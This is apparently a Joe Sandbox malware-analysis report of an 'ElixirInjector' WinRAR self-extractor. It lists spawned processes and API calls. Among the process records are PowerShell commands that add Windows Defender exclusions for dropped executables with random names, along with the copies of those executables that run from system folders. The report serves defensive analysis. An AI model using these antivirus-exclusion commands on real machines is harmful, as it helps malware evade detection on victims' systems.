Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\BitLockerDiscoveryVolumeContents\fvXBwqYdGYPkplbuTcoXecCdP.exe'
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	62
Start time:	07:20:34
Start date:	13/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe'
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	63
Start time:	07:20:34
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	64
Start time:	07:20:34
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	65
Start time:	07:20:34
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	67
Start time:	07:20:36
Start date:	13/01/2025
Path:	C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe"
Imagebase:	0x910000
File size:	150'484'992 bytes
MD5 hash:	E18151C31580AA91CEB01099DE4277B2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	68
Start time:	07:20:35
Start date:	13/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9w1FkSj5b9.bat"
Imagebase:	0x7ff75b270000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	69
Start time:	07:20:35
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	70
Start time:	07:20:38
Start date:	13/01/2025
Path:	C:\Windows\BitLockerDiscoveryVolumeContents\fvXBwqYdGYPkplbuTcoXecCdP.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\BitLockerDiscoveryVolumeContents\fvXBwqYdGYPkplbuTcoXecCdP.exe
Imagebase:	0xbe0000
File size:	150'484'992 bytes
MD5 hash:	E18151C31580AA91CEB01099DE4277B2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 58%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	71
Start time:	07:20:40
Start date:	13/01/2025
Path:	C:\Windows\BitLockerDiscoveryVolumeContents\fvXBwqYdGYPkplbuTcoXecCdP.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\BitLockerDiscoveryVolumeContents\fvXBwqYdGYPkplbuTcoXecCdP.exe
Imagebase:	0x980000
File size:	150'484'992 bytes
MD5 hash:	E18151C31580AA91CEB01099DE4277B2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	72
Start time:	07:20:39
Start date:	13/01/2025
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff768330000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	73
Start time:	07:20:40
Start date:	13/01/2025
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff61cc70000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	74
Start time:	07:20:50
Start date:	13/01/2025
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff717f30000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	75
Start time:	07:20:53
Start date:	13/01/2025
Path:	C:\Windows\Microsoft.NET\fvXBwqYdGYPkplbuTcoXecCdP.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\fvXBwqYdGYPkplbuTcoXecCdP.exe"
Imagebase:	0xa60000
File size:	150'484'992 bytes
MD5 hash:	E18151C31580AA91CEB01099DE4277B2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 58%, ReversingLabs
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	9.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	10.4%
Total number of Nodes:	1487
Total number of Limit Nodes:	44

Executed Functions

Function 00F2DF1E Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 195
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00F20863: GetModuleHandleW.KERNEL32(kernel32), ref: 00F2087C
Part of subcall function 00F20863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00F2088E
Part of subcall function 00F20863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00F208BF

Part of subcall function 00F2A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00F2A655

Part of subcall function 00F2AC16: OleInitialize.OLE32(00000000), ref: 00F2AC2F
Part of subcall function 00F2AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00F2AC66
Part of subcall function 00F2AC16: SHGetMalloc.SHELL32(00F58438), ref: 00F2AC70

GetCommandLineW.KERNEL32 ref: 00F2DF5C
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00F2DF83
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00F2DF94
UnmapViewOfFile.KERNEL32(00000000), ref: 00F2DFCE

Part of subcall function 00F2DBDE: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 00F2DBF4
Part of subcall function 00F2DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00F2DC30

CloseHandle.KERNEL32(00000000), ref: 00F2DFD7
GetModuleFileNameW.KERNEL32(00000000,00F6EC90,00000800), ref: 00F2DFF2
SetEnvironmentVariableW.KERNEL32(sfxname,00F6EC90), ref: 00F2DFFE
GetLocalTime.KERNEL32(?), ref: 00F2E009
_swprintf.LIBCMT ref: 00F2E048
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00F2E05A
GetModuleHandleW.KERNEL32(00000000), ref: 00F2E061
LoadIconW.USER32(00000000,00000064), ref: 00F2E078
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00F2E0C9
Sleep.KERNEL32(?), ref: 00F2E0F7
DeleteObject.GDI32 ref: 00F2E130
DeleteObject.GDI32(?), ref: 00F2E140
CloseHandle.KERNEL32 ref: 00F2E183

Strings

STARTDLG, xrefs: 00F2E0BE
C:\Users\user\Desktop, xrefs: 00F2DF33
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 00F2E039
sfxname, xrefs: 00F2DFF9
winrarsfxmappingfile.tmp, xrefs: 00F2DF77
sfxstime, xrefs: 00F2E055

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 3049964643-277078469
Opcode ID: 920973c41ba3542b6f9ddc6a1de9423e39790856883dc75c56cb5c45ef098e8c
Instruction ID: 7a9f409ab5c39e72dc08499eed5ea51f2efa8e4c44834740f41c0df4a9341361
Opcode Fuzzy Hash: 920973c41ba3542b6f9ddc6a1de9423e39790856883dc75c56cb5c45ef098e8c
Instruction Fuzzy Hash: 61613775904368AFD320EB74FC49F6B3BACAB95714F000429FD05921A2DBB8D944F762

Function 00F2A6C2 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00F2B73D,00000066), ref: 00F2A6D5
SizeofResource.KERNEL32(00000000,?,?,?,00F2B73D,00000066), ref: 00F2A6EC
LoadResource.KERNEL32(00000000,?,?,?,00F2B73D,00000066), ref: 00F2A703
LockResource.KERNEL32(00000000,?,?,?,00F2B73D,00000066), ref: 00F2A712
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,?,00F2B73D,00000066), ref: 00F2A72D
GlobalLock.KERNEL32(00000000), ref: 00F2A73E
CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00F2A762
GlobalUnlock.KERNEL32(00000000), ref: 00F2A7C6

Part of subcall function 00F2A626: GdipAlloc.GDIPLUS(00000010), ref: 00F2A62C

GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00F2A7A7
GlobalFree.KERNEL32(00000000), ref: 00F2A7CD

Strings

PNG, xrefs: 00F2A6C6

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
String ID: PNG
API String ID: 211097158-364855578
Opcode ID: 1bad30e987ebed4df3c6ba0918c636216fee368f1968bce43afa36ac4ec025ca
Instruction ID: 0f65cfee39c9007ef0def934ea5587dc8169a26f208bfa127836427e9ad8e6d3
Opcode Fuzzy Hash: 1bad30e987ebed4df3c6ba0918c636216fee368f1968bce43afa36ac4ec025ca
Instruction Fuzzy Hash: E031C279A0071AAFD7109F61EC88D1B7FB9FF85760B000A19FD1592260EB31DD40FAA2

Function 00F1A69B Relevance: 7.6, APIs: 5, Instructions: 105
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00F1A592,000000FF,?,?), ref: 00F1A6C4

Part of subcall function 00F1BB03: _wcslen.LIBCMT ref: 00F1BB27

FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00F1A592,000000FF,?,?), ref: 00F1A6F2
GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00F1A592,000000FF,?,?), ref: 00F1A6FE
FindNextFileW.KERNEL32(?,?,?,?,?,?,00F1A592,000000FF,?,?), ref: 00F1A728
GetLastError.KERNEL32(?,?,?,?,00F1A592,000000FF,?,?), ref: 00F1A734

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next_wcslen
String ID:
API String ID: 42610566-0
Opcode ID: 8e11407fc2cf60cbc343c24b402c2d6a80f65fcedf9e0080f76b3aabd759a305
Instruction ID: 1091f937565878fb499d7be0a2cd8c4fda80ba395906a7059aadfd206c5dddfd
Opcode Fuzzy Hash: 8e11407fc2cf60cbc343c24b402c2d6a80f65fcedf9e0080f76b3aabd759a305
Instruction Fuzzy Hash: 0E418F76901119ABCB25DF68CC84AEAF7B8FB48350F144296F959E3240D7346ED0EF90

Function 00F37DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,00F37DC4,?,00F4C300,0000000C,00F37F1B,?,00000002,00000000), ref: 00F37E0F
TerminateProcess.KERNEL32(00000000,?,00F37DC4,?,00F4C300,0000000C,00F37F1B,?,00000002,00000000), ref: 00F37E16
ExitProcess.KERNEL32 ref: 00F37E28

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: e52448aba5eef2d4e0e8077ec68de7fa77b0093cfbc056e7f98f69d3e7071683
Instruction ID: d44e1621a29f68a6426a06398d18286fce4fcf51854fda221e403a18553d1e7a
Opcode Fuzzy Hash: e52448aba5eef2d4e0e8077ec68de7fa77b0093cfbc056e7f98f69d3e7071683
Instruction Fuzzy Hash: 0BE04675400248ABCF217F24DD0AA4A3FAAEF61361F004454FC098A132CB3ADE92EA80

Function 00F1848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00F18493

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 5a3aed77598ddc663758067707affdd84063b9945f17b9ab5b5d47eb94d85bd7
Instruction ID: e62bfccd57c4a0e03fa69946592710a1b83cf28c8a74509f8f0bd5eb87541a06
Opcode Fuzzy Hash: 5a3aed77598ddc663758067707affdd84063b9945f17b9ab5b5d47eb94d85bd7
Instruction Fuzzy Hash: F1826071D04285AEDF15CF60C991BF9BBB9BF05350F0841B9E8499B142CF355ACAEB60

Function 00F26CDC Relevance: .3, Instructions: 343COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 93efbdc44b6d95d79f695a43c0c516b853b8e41913a9914b4511ca3d4a300224
Instruction ID: 9fb835f09282ff5a25e0c65a0a7c6bdad72bca86b0a7d7d472023c4bee97fdc1
Opcode Fuzzy Hash: 93efbdc44b6d95d79f695a43c0c516b853b8e41913a9914b4511ca3d4a300224
Instruction Fuzzy Hash: 8ED1D5B1A083958FCB14DF28D98075BBBE1FF89318F04456DE889DB242D774E908DB5A

Function 00F2B7E0 Relevance: 102.2, APIs: 48, Strings: 10, Instructions: 731windowfilesleepCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00F2B7E5

Part of subcall function 00F11316: GetDlgItem.USER32(00000000,00003021), ref: 00F1135A
Part of subcall function 00F11316: SetWindowTextW.USER32(00000000,00F435F4), ref: 00F11370

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00F2B8D1
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F2B8EF
IsDialogMessageW.USER32(?,?), ref: 00F2B902
TranslateMessage.USER32(?), ref: 00F2B910
DispatchMessageW.USER32(?), ref: 00F2B91A
GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00F2B93D
EndDialog.USER32(?,00000001), ref: 00F2B960
GetDlgItem.USER32(?,00000068), ref: 00F2B983
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00F2B99E
SendMessageW.USER32(00000000,000000C2,00000000,00F435F4), ref: 00F2B9B1

Part of subcall function 00F2D453: _wcslen.LIBCMT ref: 00F2D47D

SetFocus.USER32(00000000), ref: 00F2B9B8
_swprintf.LIBCMT ref: 00F2BA24

Part of subcall function 00F14092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F140A5

Part of subcall function 00F2D4D4: GetDlgItem.USER32(00000068,00F6FCB8), ref: 00F2D4E8
Part of subcall function 00F2D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,00F2AF07,00000001,?,?,00F2B7B9,00F4506C,00F6FCB8,00F6FCB8,00001000,00000000,00000000), ref: 00F2D510
Part of subcall function 00F2D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00F2D51B
Part of subcall function 00F2D4D4: SendMessageW.USER32(00000000,000000C2,00000000,00F435F4), ref: 00F2D529
Part of subcall function 00F2D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00F2D53F
Part of subcall function 00F2D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00F2D559
Part of subcall function 00F2D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00F2D59D
Part of subcall function 00F2D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00F2D5AB
Part of subcall function 00F2D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00F2D5BA
Part of subcall function 00F2D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00F2D5E1
Part of subcall function 00F2D4D4: SendMessageW.USER32(00000000,000000C2,00000000,00F443F4), ref: 00F2D5F0

GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00F2BA68
GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00F2BA90
GetTickCount.KERNEL32 ref: 00F2BAAE
_swprintf.LIBCMT ref: 00F2BAC2
GetLastError.KERNEL32(?,00000011), ref: 00F2BAF4
GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00F2BB43
_swprintf.LIBCMT ref: 00F2BB7C
CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00F2BBD0
GetCommandLineW.KERNEL32 ref: 00F2BBEA
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00F2BC47
ShellExecuteExW.SHELL32(0000003C), ref: 00F2BC6F
Sleep.KERNEL32(00000064), ref: 00F2BCB9
UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00F2BCE2
CloseHandle.KERNEL32(00000000), ref: 00F2BCEB
_swprintf.LIBCMT ref: 00F2BD1E
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00F2BD7D
SetDlgItemTextW.USER32(?,00000065,00F435F4), ref: 00F2BD94
GetDlgItem.USER32(?,00000065), ref: 00F2BD9D
GetWindowLongW.USER32(00000000,000000F0), ref: 00F2BDAC
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00F2BDBB
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00F2BE68
_wcslen.LIBCMT ref: 00F2BEBE
_swprintf.LIBCMT ref: 00F2BEE8
SendMessageW.USER32(?,00000080,00000001,?), ref: 00F2BF32
SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00F2BF4C
GetDlgItem.USER32(?,00000068), ref: 00F2BF55
SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00F2BF6B
GetDlgItem.USER32(?,00000066), ref: 00F2BF85
SetWindowTextW.USER32(00000000,00F5A472), ref: 00F2BFA7
SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00F2C007
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00F2C01A
DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00F2C0BD
EnableWindow.USER32(00000000,00000000), ref: 00F2C197
SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00F2C1D9

Part of subcall function 00F2C73F: __EH_prolog.LIBCMT ref: 00F2C744

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00F2C1FD

Strings

LICENSEDLG, xrefs: 00F2C0B2
STARTDLG, xrefs: 00F2B801
C:\Users\user\Desktop, xrefs: 00F2BBC9
%s, xrefs: 00F2BED8
"%s"%s, xrefs: 00F2BD0D
winrarsfxmappingfile.tmp, xrefs: 00F2BBA6
-el -s2 "-d%s" "-sp%s", xrefs: 00F2BB6B
__tmp_rar_sfx_access_check_%u, xrefs: 00F2BAB5
<, xrefs: 00F2BB84
@, xrefs: 00F2BB91

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: Message$ItemSend$Text$Window$_swprintf$File$DialogErrorLast$H_prologLongView_wcslen$CloseCommandCountCreateDispatchEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmap__vswprintf_c_l
String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
API String ID: 581453772-1670982708
Opcode ID: f9baf9ac5baf3954b80a967034b63fcb6c0f8e8352a9bc785abbd31d125328cc
Instruction ID: 2153e8cb7fca68d001d4ba524e546346b5bd82b4c30415d5efffd2257cc7f07b
Opcode Fuzzy Hash: f9baf9ac5baf3954b80a967034b63fcb6c0f8e8352a9bc785abbd31d125328cc
Instruction Fuzzy Hash: 1742E871D4436CBAEB21DBB0AC4AFBE376CAB01711F040155FA45A60D2CB785A85FB62

Function 00F20863 Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 316
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(kernel32), ref: 00F2087C
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00F2088E
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00F208BF
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00F20B69
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F20B83
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00F20B93
ReadFile.KERNEL32(00000000,?,00007FFE,00F43C7C,00000000), ref: 00F20BB1
CloseHandle.KERNEL32(00000000), ref: 00F20C09
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00F20C1E
CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00F43C7C,?,00000000,?,00000800), ref: 00F20C72
GetFileAttributesW.KERNELBASE(?,?,00F43C7C,00000800,?,00000000,?,00000800), ref: 00F20C9C
GetFileAttributesW.KERNEL32(?,?,00F43D44,00000800), ref: 00F20CD8

Part of subcall function 00F2081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00F20836
Part of subcall function 00F2081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00F1F2D8,Crypt32.dll,00000000,00F1F35C,?,?,00F1F33E,?,?,?), ref: 00F20858

_swprintf.LIBCMT ref: 00F20D4A
_swprintf.LIBCMT ref: 00F20D96

Part of subcall function 00F14092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F140A5

AllocConsole.KERNEL32 ref: 00F20D9E
